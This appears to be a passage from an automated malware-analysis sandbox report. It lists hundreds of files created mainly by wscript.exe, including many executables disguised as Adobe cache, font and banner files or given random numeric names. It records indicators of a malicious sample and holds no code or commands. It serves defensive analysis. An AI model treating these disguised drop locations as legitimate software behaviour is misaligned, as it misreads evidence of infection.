    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\0409654664Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Desktop\TQDFJHPUIU.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEventsJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Favorites\Reddit.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdpJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\8784112376.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\2103954313.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\6183211589.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\CookiesJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\5809130301.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\0982390758Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_BannerJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\_curlrcJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.logJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\EIVQSAOTAQ.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\EFOYFBOLXA.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\7011884383.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\1239919175.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Links\Downloads.lnkJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\user-PC-20231004-1546.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Mail Recipient.MAPIMailJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\EOWRVPQCCS.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\2385760553.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\BJZFPPWAPT.pdfJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\6422942404.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Desktop\BJZFPPWAPT.docxJump to dropped file
    Source: C:\Users\user\Desktop\BUG32.exeFile created: C:\Users\user\AppData\Local\Temp\CB7D.tmp\BUG32\jsc.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Desktop (create shortcut).DeskLinkJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\0164771190Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\1141274626Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\EIVQSAOTAQ.jpgJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\the-real-index.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnkJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\indexJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-msJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\user-PC-20231004-1550.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_1.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\EWZCVGNOWT.pdfJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_1Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_0Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.oldJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Desktop\CZQKSDDMWR.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\3322604653.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\PALRGUCVEH.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\1033868256.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\user-PC-20231004-1547.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4ca3cb58378aaa3f_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\.sesJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\offline.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\72d9f526d2e2e7c8_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Documents.mydocsJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\NYMMPCEIMA.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4a0e94571d979b3c_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\DUUDTUBZFW.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\MANIFEST-000001.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\CZQKSDDMWR.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\CURRENTJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\9217021447.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\GRXZDKKVDB.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\PALRGUCVEH.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdpJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\6750529025.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\7457734050.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\6109303877.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\EWZCVGNOWT.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Visited LinksJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\CURRENTJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\8351801105.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\DUUDTUBZFW.pngJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent StateJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6fb6d030c4ebbc21_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\4736274156.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.datJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\index.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\AdobeARM.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\000003.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\9925478147.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\BJZFPPWAPT.docxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\2265332024.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Cookies.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\7216804956.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\user-PC-20231004-1445a.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\CURRENT.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lstJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\dbghelp.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOCKJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\5622580005.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\1033868256Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\msedge_installer.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\6213653276.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\9655434068.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Desktop\DUUDTUBZFW.pngJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\2168651637.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\2669049752.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\4965367024.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\000003.logJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Favorites\Youtube.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\wmsetup.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\EOWRVPQCCS.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Favorites\Google.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEIDJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\TQDFJHPUIU.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\0653671941Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Favorites\Facebook.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\symsrv.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\BJZFPPWAPT.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\0450125302Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Desktop\BJZFPPWAPT.pdfJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\chrome_installer.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOCKJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTargetJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\CURRENTJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\Connected Devices Platform certificates.sstJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\EFOYFBOLXA.docxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\Connected Devices Platform certificates.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lstJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\1141274626.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\DUUDTUBZFW.pngJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Links\Desktop.lnkJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_3.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\EOWRVPQCCS.pdfJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\EOWRVPQCCS.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\5281104033.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\GRXZDKKVDB.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_RetentionJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\GIGIYTFFYT.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\4941266003.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\wct4B1.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lstJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcpJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\.curlrcJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\8492240360.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\the-real-indexJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Favorites\Wikipedia.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\2843307863.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\2118371548.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\9275373402.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Favorites\Amazon.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\prep_foundation_win32_bundle_V8_perf.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNKJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\4676012234.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\0450125302.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\_curlrc.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\9659692161.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.jsonJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\0518291756.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Favorites\Live.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2a426f11fd8ebe18_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\0164771190.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\jusched.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\3643399760.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\wctFE34.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_SurfaceJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\MANIFEST-000001.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.oldJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\000003.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\1287572840.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\CURRENT.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\8200946536.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\TQDFJHPUIU.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\8552718761.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\0196354653.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOCK.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Cookies-journal.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\3024948866.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\1422339599.exeJump to dropped file
    Source: C:\Users\user\Desktop\BUG32.exeFile created: C:\Users\user\AppData\Local\Temp\CB7D.tmp\BUG32\ad.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Color\ACECache11.exeJump to dropped file
